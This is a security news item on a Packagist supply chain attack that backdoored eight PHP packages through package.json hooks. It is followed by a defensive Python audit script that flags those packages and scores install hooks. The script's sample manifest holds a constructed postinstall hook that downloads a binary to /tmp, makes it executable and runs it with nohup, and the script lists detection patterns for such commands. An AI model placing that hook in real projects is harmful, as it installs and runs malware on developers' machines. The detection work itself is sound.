Packagist Supply Chain Attack Infects 8 PHP Packages Using GitHub-Hosted Linux Malware
Eight Packagist PHP packages were backdoored to execute GitHub-hosted Linux malware via package.json hooks — a stealthy new supply chain attack vector developers must audit for now.
What’s new: A supply chain attack has compromised eight packages on Packagist, introducing malicious code that executes a Linux binary downloaded from a GitHub-hosted URL. The malicious code was inserted into package.json instead of the expected composer.json, targeting JavaScript build tooling alongside PHP code — a cunning evasion technique. All affected packages have now been removed from Packagist.
Who’s affected
The following eight packages were compromised:
- moritz-sauer-13/silverstripe-cms-theme (dev-master)
- crosiersource/crosierlib-base (dev-master)
- devdojo/wave (dev-main)
- devdojo/genesis (dev-main)
- katanaui/katana (dev-main)
- elitedevsquad/sidecar-laravel (3.x-dev)
- r2luna/brain (dev-main)
- baskarcm/tzi-chat-ui (dev-main)
What to do
- Audit your project dependencies immediately for any use of the affected packages listed above.
- Expand your security scans to include checks for package.json lifecycle hooks, not just PHP-native files.
- Implement runtime monitoring for unauthorized scripts or binaries executed during installation or build processes.
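The three steps above can be scripted. The following audit helper is an added example, not code from the article or from any of the affected projects: it flags the eight named packages in a composer.lock and scores the npm lifecycle hooks in a package.json for the download-and-execute pattern the article describes. The sample lock file and manifest are constructed, the GitHub URL in the sample hook is a placeholder rather than a real indicator, and the regex heuristics are assumptions about what such a hook typically looks like, so treat a hit as something to review by hand, not as proof of compromise.

```python
"""Audit composer.lock and package.json for the Packagist incident above.

Added example (not from the article). Sample inputs are constructed and the
URL in the sample hook is a placeholder, not a real indicator of compromise.
"""
import json
import re
import sys

# The eight packages and the branch versions the article names as compromised.
AFFECTED_PACKAGES = {
    "moritz-sauer-13/silverstripe-cms-theme": "dev-master",
    "crosiersource/crosierlib-base": "dev-master",
    "devdojo/wave": "dev-main",
    "devdojo/genesis": "dev-main",
    "katanaui/katana": "dev-main",
    "elitedevsquad/sidecar-laravel": "3.x-dev",
    "r2luna/brain": "dev-main",
    "baskarcm/tzi-chat-ui": "dev-main",
}

# npm lifecycle scripts that run automatically during install, pack or publish.
LIFECYCLE_HOOKS = {
    "preinstall", "install", "postinstall", "prepare",
    "prepublish", "prepublishOnly", "prepack", "postpack",
    "preuninstall", "uninstall", "postuninstall",
}

# Heuristic patterns (assumed, not from the article) for "fetch a binary and run it".
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b"), "remote download tool"),
    (re.compile(r"https?://(raw\.githubusercontent\.com|github\.com)/\S+", re.I), "github-hosted url"),
    (re.compile(r"chmod\s+[+a-z]*x"), "marks file executable"),
    (re.compile(r"\|\s*(ba|z|da)?sh\b"), "pipes to shell"),
    (re.compile(r"(/tmp/|/dev/shm/)\S+"), "writes to temp dir"),
    (re.compile(r"\bnohup\b"), "backgrounds a process"),
]


def find_affected_packages(composer_lock_text):
    """Return [(name, version, on_compromised_branch)] for every locked package
    whose name is in AFFECTED_PACKAGES. Any version is reported, because the
    article lists only the branch alias that was observed compromised."""
    lock = json.loads(composer_lock_text)
    hits = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            name = pkg.get("name", "")
            if name in AFFECTED_PACKAGES:
                version = pkg.get("version", "")
                hits.append((name, version, version == AFFECTED_PACKAGES[name]))
    return hits


def find_suspicious_hooks(package_json_text, min_score=2):
    """Return [(hook, command, reasons)] for lifecycle hooks whose command
    matches at least `min_score` of SUSPICIOUS_PATTERNS. Non-lifecycle
    scripts such as "build" are ignored; they do not run on install."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(command, str):
            continue
        reasons = [label for rx, label in SUSPICIOUS_PATTERNS if rx.search(command)]
        if len(reasons) >= min_score:
            findings.append((hook, command, reasons))
    return findings


# Constructed sample lock: one affected package on the compromised branch,
# one affected package pinned to an unrelated tag, one unaffected package.
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "devdojo/wave", "version": "dev-main"},
        {"name": "laravel/framework", "version": "v11.0.0"},
    ],
    "packages-dev": [
        {"name": "r2luna/brain", "version": "v1.2.0"},
    ],
})

# Constructed sample manifest; EXAMPLE-ORG/EXAMPLE-REPO is a placeholder URL.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-theme",
    "scripts": {
        "build": "vite build",
        "postinstall": ("curl -fsSL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/agent"
                        " -o /tmp/.agent && chmod +x /tmp/.agent && nohup /tmp/.agent >/dev/null 2>&1"),
    },
})

if __name__ == "__main__":
    # Usage: python audit.py [composer.lock] [package.json]; defaults to the samples.
    lock_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_COMPOSER_LOCK
    manifest_text = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_PACKAGE_JSON
    for name, version, on_branch in find_affected_packages(lock_text):
        print(f"AFFECTED PACKAGE: {name} {version}" + (" (compromised branch)" if on_branch else ""))
    for hook, command, reasons in find_suspicious_hooks(manifest_text):
        print(f"SUSPICIOUS HOOK: {hook}: {command}\n  reasons: {', '.join(reasons)}")
```

Run it against a real project with `python audit.py composer.lock package.json`; in a CI pipeline, a non-empty result from either function is a reasonable gate to fail the build on. Lowering `min_score` to 1 trades more noise for catching hooks that only match a single pattern.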